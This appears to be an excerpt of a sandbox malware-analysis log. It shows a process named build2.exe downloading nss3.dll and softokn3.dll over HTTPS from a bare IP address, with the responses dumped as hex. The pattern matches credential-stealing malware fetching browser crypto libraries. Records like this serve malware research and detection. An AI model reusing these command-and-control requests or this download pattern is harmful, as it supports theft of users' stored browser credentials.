2024-05-25 19:30:15 UTC	16384	IN	Data Raw: 89 75 fc 89 46 04 c7 06 7c 69 00 10 83 66 08 00 ff 15 d0 72 06 10 6a 00 89 46 08 ff 15 90 71 06 10 59 8b c6 5e c9 c2 08 00 cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 51 8b 45 0c 56 8b f1 89 75 fc 89 46 04 c7 06 e8 65 00 10 83 66 08 00 ff 15 d0 72 06 10 6a 00 89 46 08 ff 15 90 71 06 10 59 8b c6 5e c9 c2 08 00 56 8b f1 ff 76 0c c7 06 4c 68 00 10 ff 15 90 71 06 10 59 c7 06 28 52 00 10 5e c3 56 8b f1 ff 76 0c c7 06 8c 66 00 10 ff 15 90 71 06 10 59 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc 56 8b f1 c7 06 50 69 00 10 e8 e2 71 00 00 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc cc cc cc 56 8b f1 c7 06 90 67 00 10 e8 c2 71 00 00 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc cc cc cc 56 8b f1 ff 76 08 c7 06 7c 69 00 10 ff 15 90 71 06 10 59 c7 06 28 52 00 10 Data Ascii: uF\|ifrjFqY^UQEVuFefrjFqY^VvLhqY(R^VvfqY(R^VPiq(R^Vgq(R^Vv\|iqY(R
2024-05-25 19:30:15 UTC	16384	IN	Data Raw: 80 7f 04 00 75 07 8b cf e8 85 26 00 00 0f b7 47 06 50 ff b5 74 ff ff ff e8 9a a8 ff ff 59 59 83 f8 0a 73 3c 8a 80 2c 6a 00 10 8b 4d 8c 88 85 64 ff ff ff ff b5 64 ff ff ff e8 5f 18 ff ff 8b 4d d8 8d 45 d8 83 fb 10 72 02 8b c1 80 3c 30 7f 74 4c 8d 45 d8 83 fb 10 72 02 8b c1 fe 04 30 eb 3a 8d 45 d8 83 fb 10 72 03 8b 45 d8 80 3c 30 00 74 45 80 7f 04 00 0f b7 47 06 75 0b 8b cf e8 10 26 00 00 0f b7 47 06 66 3b 85 60 ff ff ff 75 27 6a 00 8d 4d d8 e8 04 18 ff ff 46 8b 5d ec 8b cf e8 24 11 00 00 ff 75 98 8b cf e8 de 72 00 00 84 c0 0f 84 4a ff ff ff 8b 5d 90 85 f6 74 13 83 7d ec 10 8d 45 d8 72 03 8b 45 d8 80 3c 30 00 7e 52 46 8a 45 a7 83 7d d4 10 8d 55 c0 72 03 8b 55 c0 84 c0 75 49 85 f6 74 5e 8a 0a 80 f9 7f 74 57 83 ee 01 74 11 83 7d ec 10 8d 45 d8 72 03 8b 45 d8 Data Ascii: u&GPtYYs<,jMdd_MEr<0tLEr0:ErE<0tEGu&Gf;`u'jMF]$urJ]t}ErE<0~RFE}UrUuIt^tWt}ErE

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.4	49799	65.109.242.59	443	5316	C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-25 19:30:17 UTC	170	OUT	GET /nss3.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0 Host: 65.109.242.59 Cache-Control: no-cache
2024-05-25 19:30:18 UTC	248	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 25 May 2024 19:30:18 GMT Content-Type: application/octet-stream Content-Length: 2046288 Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT Connection: close ETag: "6315a9f4-1f3950" Accept-Ranges: bytes
2024-05-25 19:30:18 UTC	16136	IN	Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!.`pl- @A&@
2024-05-25 19:30:18 UTC	16384	IN	Data Raw: 89 c2 69 f3 90 01 00 00 29 f0 83 e2 03 66 85 d2 0f 94 c2 66 85 ff 0f 95 c6 20 d6 66 85 c0 0f 94 c0 08 f0 0f b6 c0 8d 04 40 8b 55 f0 0f be 84 82 20 7c 1a 10 89 41 10 8a 41 1a fe c8 0f b6 c0 ba 06 00 00 00 0f 49 d0 88 51 1a e9 f7 fe ff ff 83 c2 e8 89 51 0c 8b 41 10 89 45 f0 8b 71 14 40 89 41 10 66 ff 41 1c 0f b7 41 18 a8 03 0f 94 c3 69 f8 29 5c 00 00 8d 97 1c 05 00 00 66 c1 ca 02 0f b7 d2 81 fa 8f 02 00 00 0f 93 c2 20 da 81 c7 10 05 00 00 66 c1 cf 04 0f b7 ff 81 ff a3 00 00 00 0f 92 c6 08 d6 0f b6 d6 8d 14 52 0f be 94 96 20 7c 1a 10 39 55 f0 7c 26 89 f7 c7 41 10 01 00 00 00 8d 56 01 89 51 14 83 fe 0b 7c 12 c7 41 14 00 00 00 00 40 66 89 41 18 66 c7 41 1c 00 00 8a 41 1a fe c0 31 d2 3c 07 0f b6 c0 0f 4d c2 88 41 1a e9 51 fe ff ff c7 41 14 0b 00 00 00 8b 51 18 Data Ascii: i)ff f@U \|AAIQQAEq@AfAAi)\f fR \|9U\|&AVQ\|A@fAfAA1<MAQAQ
2024-05-25 19:30:18 UTC	16384	IN	Data Raw: 7f 06 00 74 69 31 db 8b 44 9f 14 be 48 01 1d 10 85 c0 74 02 8b 30 68 d3 fe 1b 10 56 e8 f7 5b 19 00 83 c4 08 85 c0 b8 79 64 1c 10 0f 45 c6 8b 4f 10 0f b6 0c 19 f6 c1 02 ba 98 dc 1c 10 be 48 01 1d 10 0f 44 d6 f6 c1 01 b9 b1 de 1c 10 0f 44 ce 50 52 51 68 7f a0 1b 10 8d 44 24 60 50 e8 d6 b7 06 00 83 c4 14 43 0f b7 47 06 39 c3 72 99 8b 44 24 60 8d 48 01 3b 4c 24 58 0f 83 b7 03 00 00 89 4c 24 60 8b 4c 24 54 c6 04 01 29 eb 25 8b 44 24 04 8b 4c 24 08 8b 44 81 10 0f be 08 8d 54 24 50 51 ff 70 20 68 2c e2 1c 10 52 e8 89 b7 06 00 83 c4 10 f6 44 24 64 07 0f 85 4b 03 00 00 8b 44 24 54 85 c0 74 21 8b 4c 24 60 c6 04 08 00 83 7c 24 5c 00 74 12 f6 44 24 65 04 75 0b 8d 4c 24 50 e8 d4 68 06 00 eb 04 8b 44 24 54 89 44 24 18 8b 45 08 8b 80 a0 00 00 00 83 e0 0c 83 f8 08 0f 85 Data Ascii: ti1DHt0hV[ydEOHDDPRQhD$`PCG9rD$`H;L$XL$`L$T)%D$L$DT$PQp h,RD$dKD$Tt!L$`\|$\tD$euL$PhD$TD$E
2024-05-25 19:30:18 UTC	16384	IN	Data Raw: 11 1e 10 77 26 8b 35 38 11 1e 10 85 f6 74 15 8b 0d 78 e0 1d 10 81 f9 80 c2 12 10 75 7b 56 ff 15 68 cc 1d 10 89 f8 5e 5f 5b 5d c3 a3 30 11 1e 10 eb d3 a3 0c 11 1e 10 eb b9 89 3d 20 11 1e 10 e9 54 ff ff ff 31 ff eb dc 8b 0d 40 e0 1d 10 ff 15 00 40 1e 10 57 ff d1 83 c4 04 eb ca ff 15 00 40 1e 10 56 ff d1 83 c4 04 e9 0b ff ff ff 89 f7 c1 ff 1f 29 f1 19 f8 31 d2 39 0d e4 10 1e 10 19 c2 7d 27 c7 05 50 11 1e 10 00 00 00 00 e9 20 ff ff ff 31 ff e9 6d ff ff ff ff 15 00 40 1e 10 56 ff d1 83 c4 04 e9 7b ff ff ff c7 05 50 11 1e 10 01 00 00 00 8b 1d 38 11 1e 10 85 db 74 2e 8b 0d 78 e0 1d 10 ff 15 00 40 1e 10 53 ff d1 83 c4 04 8b 1d 38 11 1e 10 85 db 74 12 8b 0d 70 e0 1d 10 ff 15 00 40 1e 10 53 ff d1 83 c4 04 a1 4c 11 1e 10 8b 0d 48 11 1e 10 89 ca 09 c2 0f 84 b1 fe ff Data Ascii: w&58txu{Vh^_[]0= T1@@W@V)19}'P 1m@V{P8t.x@S8tp@SLH
2024-05-25 19:30:18 UTC	16384	IN	Data Raw: 24 08 8b 70 44 8b 06 85 c0 0f 84 81 fd ff ff 8b 48 04 ff 15 00 40 1e 10 56 ff d1 83 c4 04 c7 06 00 00 00 00 e9 67 fd ff ff 8b 44 24 08 8b 70 40 8b 06 85 c0 74 2d 8b 4c 24 08 80 79 0d 00 75 11 8b 48 20 ff 15 00 40 1e 10 6a 01 56 ff d1 83 c4 08 8b 44 24 08 80 78 12 05 74 08 8b 44 24 08 c6 40 12 01 8b 4c 24 08 8a 41 0c 88 41 13 e9 13 fe ff ff 8b 44 24 08 8b 30 8b 4e 1c 85 c9 0f 84 88 fa ff ff 8b 44 24 08 8b b8 ec 00 00 00 ff 15 00 40 1e 10 6a 00 57 56 ff d1 83 c4 0c 89 44 24 0c e9 72 f6 ff ff 8b 4c 24 08 89 81 a0 00 00 00 e9 f7 f9 ff ff 8b 48 04 ff 15 00 40 1e 10 56 ff d1 83 c4 04 c7 06 00 00 00 00 e9 26 fa ff ff 31 f6 46 e9 d2 fc ff ff 31 db f6 44 24 1c 01 0f 84 40 fe ff ff 68 40 7e 1c 10 68 83 e4 00 00 68 14 dd 1b 10 68 78 fc 1b 10 6a 0e e8 0a 8f 02 00 83 Data Ascii: $pDH@VgD$p@t-L$yuH @jVD$xtD$@L$AAD$0ND$@jWVD$rL$H@V&1F1D$@h@~hhhxj
2024-05-25 19:30:18 UTC	16384	IN	Data Raw: 6f 8b 7d 0c 89 54 24 04 8b 0d 30 e4 1d 10 8b 45 08 8b 40 08 89 04 24 ff 15 00 40 1e 10 8d 44 24 10 50 8d 44 24 10 50 56 57 ff 74 24 10 ff d1 85 c0 0f 84 92 00 00 00 8b 44 24 0c 85 c0 8b 54 24 04 74 42 29 c6 72 3e 01 c2 83 d3 00 89 54 24 18 89 d9 81 e1 ff ff ff 7f 89 4c 24 1c 01 c7 85 f6 7f a2 8b 44 24 24 85 c0 0f 85 92 00 00 00 31 ff 8b 4c 24 28 31 e9 e8 9d 64 13 00 89 f8 8d 65 f4 5e 5f 5b 5d c3 8b 0d 8c e2 1d 10 ff 15 00 40 1e 10 ff d1 89 c2 8b 45 08 89 50 14 83 fa 70 74 05 83 fa 27 75 3f bf 0d 00 00 00 b9 0d 00 00 00 68 ee b2 00 00 8b 45 08 ff 70 1c 68 65 8a 1c 10 e8 c4 1e 14 00 83 c4 0c eb a7 8d 4c 24 24 8d 54 24 08 e8 12 20 14 00 85 c0 0f 85 2a ff ff ff 8b 54 24 08 eb b1 bf 0a 03 00 00 b9 0a 03 00 00 68 f3 b2 00 00 8b 45 08 ff 70 1c 68 20 85 1c 10 eb Data Ascii: o}T$0E@$@D$PD$PVWt$D$T$tB)r>T$L$D$$1L$(1de^_[]@EPpt'u?hEpheL$$T$ *T$hEph
2024-05-25 19:30:18 UTC	16384	IN	Data Raw: 68 7c ec 8b 44 24 0c 89 46 68 83 7c 24 04 01 75 72 8b 56 64 8d 1c 40 c1 e3 04 83 7c 1a 1c 00 74 4b 8b 4e 48 8b 01 85 c0 74 42 3d 58 00 1a 10 75 34 8b 86 a8 00 00 00 8b be ac 00 00 00 83 c0 04 83 d7 00 89 74 24 04 89 d6 8b 54 1a 18 0f af fa f7 e2 01 fa 52 50 51 e8 8c 45 12 00 89 f2 8b 74 24 10 83 c4 0c 8b 44 1a 18 89 46 38 31 ff 8b 4c 24 30 31 e9 e8 9f 24 13 00 89 f8 8d 65 f4 5e 5f 5b 5d c3 89 74 24 04 8b 86 e8 00 00 00 89 44 24 08 85 c0 0f 84 88 01 00 00 83 7c 24 0c 00 0f 84 ac 00 00 00 8b 44 24 04 8b 70 64 85 f6 0f 84 9d 00 00 00 8b 44 24 0c 48 8d 3c 40 c1 e7 04 8b 44 3e 14 89 44 24 0c b9 00 02 00 00 31 d2 e8 56 3e ff ff 89 44 24 18 85 c0 0f 84 ce 02 00 00 8d 04 3e 89 44 24 14 8d 04 3e 83 c0 14 89 44 24 08 8b 5c 24 18 89 d8 83 c0 04 68 fc 01 00 00 6a 00 Data Ascii: h\|D$Fh\|$urVd@\|tKNHtB=Xu4t$TRPQEt$DF81L$01$e^_[]t$D$\|$D$pdD$H<@D>D$1V>D$>D$>D$\$hj
2024-05-25 19:30:18 UTC	16384	IN	Data Raw: 00 00 00 8b 99 48 01 00 00 85 db 75 6b 8b 99 44 01 00 00 85 db 75 7b ff 81 40 01 00 00 8a 5d f3 88 d8 50 e8 d0 ca 11 00 83 c4 04 89 c3 85 c0 0f 84 a7 00 00 00 57 ff 75 e4 53 e8 0f 1c 18 00 83 c4 0c c6 04 3b 00 8d 04 b6 8b 4d ec 8d 04 81 83 c0 0c 89 18 0f b6 0b 80 b9 7a f8 19 10 00 78 4a 8b 4d e8 80 b9 d0 00 00 00 02 0f 83 83 00 00 00 83 c4 10 5e 5f 5b 5d c3 8b 03 89 81 48 01 00 00 e9 50 ff ff ff 8b 03 89 81 4c 01 00 00 e9 43 ff ff ff 8b 03 89 81 44 01 00 00 e9 36 ff ff ff ff 81 3c 01 00 00 e9 73 ff ff ff 80 f9 5b 0f b6 c9 ba 5d 00 00 00 0f 45 d1 89 55 ec 31 f6 46 89 df 8a 0c 33 3a 4d ec 74 06 88 0f 46 47 eb f2 8b 4d ec 38 4c 33 01 74 2d c6 07 00 eb 84 8d 04 b6 8b 4d ec 8d 04 81 83 c0 0c c7 00 00 00 00 00 e9 6d ff ff ff 8b 10 8b 4d e8 83 c4 10 5e 5f 5b 5d Data Ascii: HukDu{@]PWuS;MzxJM^_[]HPLCD6<s[]EU1F3:MtFGM8L3t-MmM^_[]
2024-05-25 19:30:18 UTC	16384	IN	Data Raw: f6 ff ff 8b 57 10 85 d2 74 09 8b 4c 24 20 e8 75 c2 ff ff 8b 7c 24 0c c7 47 10 00 00 00 00 e9 98 f6 ff ff 8b 06 89 81 44 01 00 00 e9 e3 f9 ff ff ff 81 3c 01 00 00 e9 80 fc ff ff 8b 44 24 14 80 b8 d0 00 00 00 00 0f 85 f3 fb ff ff 8b 44 24 20 8b 40 10 8b 4c 38 0c 83 79 48 00 0f 85 de fb ff ff ff 34 38 68 b4 e0 1c 10 ff 74 24 1c e8 06 09 00 00 83 c4 0c e9 c5 fb ff ff 8b 4c 24 1c e9 ae fd ff ff 8a 80 08 f7 19 10 3a 83 08 f7 19 10 0f 84 02 fa ff ff e9 c9 f9 ff ff 8b 44 24 20 80 b8 b1 00 00 00 00 0f 84 47 04 00 00 68 48 01 1d 10 ff 74 24 18 e8 5f 2a 01 00 83 c4 08 e9 33 f7 ff ff 8b 44 24 0c 80 48 1e 01 66 83 78 22 00 0f 8e a5 f5 ff ff 31 c9 b8 0e 00 00 00 8b 54 24 0c 8b 52 04 8b 74 02 f6 89 f7 c1 ef 04 83 e7 0f 83 ff 01 74 09 85 ff 75 0a e9 69 03 00 00 c6 44 02 Data Ascii: WtL$ u\|$GD<D$D$ @L8yH48ht$L$:D$ GhHt$_*3D$Hfx"1T$RttuiD
2024-05-25 19:30:18 UTC	16384	IN	Data Raw: c7 44 24 24 00 00 00 00 e9 0b f1 ff ff 8b 44 24 0c 8b 40 10 8b 40 1c 8b 4c 24 08 3b 41 3c 0f 84 95 ea ff ff 8b 7c 24 08 ff 37 68 27 f8 1c 10 ff 74 24 0c e8 e0 ea 00 00 83 c4 0c c7 44 24 24 00 00 00 00 e9 a2 f0 ff ff 68 48 e4 1b 10 8b 7c 24 08 57 e8 c1 ea 00 00 83 c4 08 be 0b 00 00 00 68 40 7e 1c 10 68 14 ce 01 00 68 40 bb 1b 10 68 78 fc 1b 10 56 e8 8f 4f 01 00 83 c4 14 89 77 0c c7 44 24 1c 00 00 00 00 e9 83 f8 ff ff 66 ba 1e 00 31 c0 85 c9 0f 85 54 f1 ff ff 31 d2 e9 5b f1 ff ff 31 ff 66 ba 28 00 be ff 0f 00 00 89 cb 31 c0 83 c2 28 89 f9 0f a4 d9 1c c1 e8 04 39 de bb 00 00 00 00 19 fb 89 cb 89 c7 0f 83 f2 f0 ff ff eb df a9 fd ff ff ff 74 65 31 f6 46 b8 ec bb 1b 10 e9 c1 fd ff ff 31 c0 e9 85 f2 ff ff c7 44 24 18 00 00 00 00 e9 36 f8 ff ff 8b 40 14 e9 d1 e9 Data Ascii: D$$D$@@L$;A<\|$7h't$D$$hH\|$Wh@~hh@hxVOwD$f1T1[1f(1(9te1F1D$6@

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.4	49800	65.109.242.59	443	5316	C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-25 19:30:21 UTC	174	OUT	GET /softokn3.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0 Host: 65.109.242.59 Cache-Control: no-cache
2024-05-25 19:30:21 UTC	246	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 25 May 2024 19:30:21 GMT Content-Type: application/octet-stream Content-Length: 257872 Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT Connection: close ETag: "6315a9f4-3ef50" Accept-Ranges: bytes
2024-05-25 19:30:21 UTC	16138	IN	Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSw
2024-05-25 19:30:21 UTC	16384	IN	Data Raw: ff 89 85 f4 fe ff ff c7 85 f8 fe ff ff 04 00 00 00 8d 85 f0 fe ff ff 6a 01 50 53 57 e8 85 af 00 00 83 c4 10 89 c6 85 c0 75 3f 8b 85 ec fe ff ff 83 c0 fd 83 f8 01 77 25 be 30 00 00 00 83 3d 28 9a 03 10 00 75 23 83 3d 50 90 03 10 00 74 0e be 01 01 00 00 f6 05 20 9a 03 10 01 74 0c 53 57 e8 e2 b9 00 00 83 c4 08 89 c6 83 3d 2c 9a 03 10 00 0f 84 5e ff ff ff 8b 85 ec fe ff ff 83 c0 fe 83 f8 02 0f 87 4c ff ff ff 56 53 57 68 85 6b 03 10 68 00 01 00 00 8d 85 f0 fe ff ff 50 ff 15 1c 7c 03 10 83 c4 18 e9 2a ff ff ff cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 81 ec 08 01 00 00 a1 14 90 03 10 31 e8 89 45 f0 c7 85 ec fe ff ff 00 00 00 00 be 30 00 00 00 83 3d 28 9a 03 10 00 74 17 8b 4d f0 31 e9 e8 28 8b 02 00 89 f0 81 c4 08 01 00 00 5e 5f 5b 5d c3 8b 5d 0c c7 Data Ascii: jPSWu?w%0=(u#=Pt tSW=,^LVSWhkhP\|*USWV1E0=(tM1(^_[]]
2024-05-25 19:30:21 UTC	16384	IN	Data Raw: ff 83 c4 10 85 c0 0f 85 6b 03 00 00 57 e8 c4 9d ff ff 83 c4 04 ff 75 e8 53 57 e8 f7 9d ff ff 83 c4 0c ff 75 e8 8d 45 e8 50 53 57 e8 26 9e ff ff 83 c4 10 85 c0 0f 85 3c 03 00 00 8b 4d c8 83 c1 01 8b 75 e4 8b 45 dc 01 f0 3b 4d c0 0f 85 6c ff ff ff 31 f6 e9 20 03 00 00 31 f6 ff 35 30 9a 03 10 ff 15 f0 7b 03 10 83 c4 04 a1 34 9a 03 10 85 c0 74 15 6a 01 50 e8 57 4e 02 00 83 c4 08 c7 05 34 9a 03 10 00 00 00 00 a1 38 9a 03 10 85 c0 74 15 6a 01 50 e8 39 4e 02 00 83 c4 08 c7 05 38 9a 03 10 00 00 00 00 a1 3c 9a 03 10 85 c0 74 15 6a 01 50 e8 1b 4e 02 00 83 c4 08 c7 05 3c 9a 03 10 00 00 00 00 56 e8 e8 4d 02 00 83 c4 04 a3 34 9a 03 10 8b 47 38 a3 40 9a 03 10 8b 47 28 a3 44 9a 03 10 8b 47 2c a3 48 9a 03 10 8d 47 04 50 e8 bf 4d 02 00 83 c4 04 a3 38 9a 03 10 ff 75 0c e8 Data Ascii: kWuSWuEPSW&<MuE;Ml1 150{4tjPWN48tjP9N8<tjPN<VM4G8@G(DG,HGPM8u
2024-05-25 19:30:21 UTC	16384	IN	Data Raw: 10 88 41 03 0f b6 41 04 d1 e8 8a 80 68 f9 02 10 88 41 04 0f b6 41 05 d1 e8 8a 80 68 f9 02 10 88 41 05 0f b6 41 06 d1 e8 8a 80 68 f9 02 10 88 41 06 0f b6 41 07 d1 e8 8a 80 68 f9 02 10 88 41 07 ba 01 01 01 01 8b 31 31 d6 33 51 04 b8 01 00 00 00 09 f2 0f 84 37 01 00 00 ba 1f 1f 1f 1f 33 11 be 0e 0e 0e 0e 33 71 04 09 d6 0f 84 20 01 00 00 ba e0 e0 e0 e0 33 11 be f1 f1 f1 f1 33 71 04 09 d6 0f 84 09 01 00 00 ba fe fe fe fe 8b 31 31 d6 33 51 04 09 f2 0f 84 f5 00 00 00 ba 01 fe 01 fe 8b 31 31 d6 33 51 04 09 f2 0f 84 e1 00 00 00 ba fe 01 fe 01 8b 31 31 d6 33 51 04 09 f2 0f 84 cd 00 00 00 ba 1f e0 1f e0 33 11 be 0e f1 0e f1 33 71 04 09 d6 0f 84 b6 00 00 00 ba e0 1f e0 1f 33 11 be f1 0e f1 0e 33 71 04 09 d6 0f 84 9f 00 00 00 ba 01 e0 01 e0 33 11 be 01 f1 01 f1 33 71 Data Ascii: AAhAAhAAhAAhA113Q733q 33q113Q113Q113Q33q33q33q
2024-05-25 19:30:21 UTC	16384	IN	Data Raw: 00 e9 21 07 00 00 3d 50 06 00 00 0f 8f aa 01 00 00 3d 51 05 00 00 74 2d 3d 52 05 00 00 74 12 3d 55 05 00 00 0f 85 0a 07 00 00 c7 47 0c 01 00 00 00 83 7b 04 00 0f 84 ec 06 00 00 83 7b 08 10 0f 85 e2 06 00 00 c7 47 18 10 00 00 00 83 7c 24 24 25 0f 85 fb 07 00 00 6a 11 ff 74 24 30 e8 44 c7 00 00 83 c4 08 85 c0 0f 84 78 09 00 00 89 c7 31 c0 81 3b 51 05 00 00 0f 95 c0 ff 77 1c 8b 4d 20 51 50 ff 73 04 ff 77 18 e8 09 1e ff ff 83 c4 14 8b 4c 24 28 89 41 64 57 e8 a9 c6 00 00 83 c4 04 8b 44 24 28 83 78 64 00 0f 84 bf 08 00 00 83 7d 20 00 b9 60 2a 00 10 ba 20 2a 00 10 0f 44 d1 89 50 74 c7 80 84 00 00 00 e0 29 00 10 e9 eb 08 00 00 3d 09 21 00 00 0f 8e 1c 02 00 00 3d 0a 21 00 00 0f 84 08 02 00 00 3d 0b 21 00 00 0f 84 23 02 00 00 3d 21 40 00 00 0f 85 37 06 00 00 83 7c Data Ascii: !=P=Qt-=Rt=UG{{G\|$$%jt$0Dx1;QwM QPswL$(AdWD$(xd} `* *DPt)=!=!=!#=!@7\|
2024-05-25 19:30:21 UTC	16384	IN	Data Raw: 14 90 03 10 31 e8 89 45 f0 ff 75 08 e8 35 ab 00 00 83 c4 04 85 c0 74 5f 89 c6 8b 78 38 bb 91 00 00 00 85 ff 74 56 83 3f 03 75 51 8b 4d 18 8b 47 04 83 7d 14 00 74 59 8b 5d 0c 85 c0 74 64 89 ce 8b 4d 08 89 da 6a 03 ff 75 10 e8 47 fa ff ff 83 c4 08 89 c3 85 c0 75 24 56 ff 75 14 ff 75 08 e8 72 fd ff ff 83 c4 0c 89 c6 8b 4d f0 31 e9 e8 a3 8b 01 00 89 f0 eb 11 bb b3 00 00 00 8b 4d f0 31 e9 e8 90 8b 01 00 89 d8 83 c4 10 5e 5f 5b 5d c3 85 c0 74 06 83 7f 68 00 74 5a 81 c7 90 00 00 00 eb 55 8b 01 89 45 e8 8b 47 64 89 45 e4 8b 4f 74 ff 15 00 a0 03 10 8d 45 ec ff 75 10 53 ff 75 e8 50 ff 75 14 ff 75 e4 ff d1 83 c4 18 85 c0 74 32 e8 a1 8d 01 00 50 e8 eb 84 00 00 83 c4 04 8b 55 ec 8b 4d 18 89 11 bb 50 01 00 00 3d 50 01 00 00 74 8a eb 18 83 c7 60 8b 07 89 01 31 db e9 7a Data Ascii: 1Eu5t_x8tV?uQMG}tY]tdMjuGu$VuurM1M1^_[]thtZUEGdEOtEuSuPuut2PUMP=Pt`1z
2024-05-25 19:30:21 UTC	16384	IN	Data Raw: d8 00 00 00 00 c7 45 d4 04 00 00 00 eb 18 0f 1f 84 00 00 00 00 00 8b 47 fc 8b 00 89 45 d8 83 c7 0c 83 c6 ff 74 5a 8b 47 f8 85 c0 74 19 3d 61 01 00 00 74 e2 8b 4f fc eb 15 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 8b 4f fc 8b 11 89 55 d4 ff 37 51 50 ff 75 dc e8 8c 53 00 00 83 c4 10 85 c0 74 bd 89 c3 e9 80 01 00 00 bf 02 00 00 00 e9 83 01 00 00 c7 45 d4 04 00 00 00 c7 45 d8 00 00 00 00 8b 45 10 8b 4d 0c 83 ec 1c 0f 28 05 40 fb 02 10 0f 11 44 24 0c 89 44 24 08 89 4c 24 04 8b 45 08 89 04 24 e8 fe 7c ff ff 83 c4 1c 85 c0 74 0c 89 c3 ff 75 dc e8 7d 5a 00 00 eb 3d 8b 7d 18 8b 5d 14 57 e8 8b 4d 01 00 83 c4 04 89 c6 89 7d ec 8d 45 ec 50 56 57 53 ff 75 08 e8 e8 9a ff ff 83 c4 14 85 c0 74 26 89 c3 ff 75 dc e8 47 5a 00 00 83 c4 04 56 e8 78 4d 01 00 83 c4 04 83 fb 40 bf Data Ascii: EGEtZGt=atOf.OU7QPuStEEEM(@D$D$L$E$\|tu}Z=}]WM}EPVWSut&uGZVxM@
2024-05-25 19:30:21 UTC	16384	IN	Data Raw: 8b 48 38 b8 91 00 00 00 85 c9 74 4a 83 39 02 75 45 83 79 04 00 74 3f 8b 55 0c 8b 59 6c 83 c3 08 89 1f 31 c0 85 d2 74 2e b8 50 01 00 00 39 de 72 25 8b 01 89 02 8b 41 70 89 42 04 83 c2 08 ff 71 6c ff 71 64 52 e8 cc 0f 01 00 83 c4 0c 31 c0 eb 05 b8 b3 00 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 ec 10 8b 7d 10 a1 14 90 03 10 31 e8 89 45 f0 85 ff 0f 84 2d 01 00 00 8b 5d 0c 8b 33 ff 75 08 e8 b5 2a 00 00 83 c4 04 b9 b3 00 00 00 85 c0 0f 84 12 01 00 00 83 fe 0a 0f 87 f7 00 00 00 b9 78 06 00 00 0f a3 f1 73 12 8d 48 38 eb 1a 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 b9 83 01 00 00 0f a3 f1 73 e4 8d 48 34 8b 09 83 fe 0a 77 2f ba 78 06 00 00 0f a3 f2 73 12 83 c0 38 eb 1a 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 ba 83 01 00 00 0f a3 f2 73 Data Ascii: H8tJ9uEyt?UYl1t.P9r%ApBqlqdR1^_[]USWV}1E-]3u*xsH8f.sH4w/xs8f.s
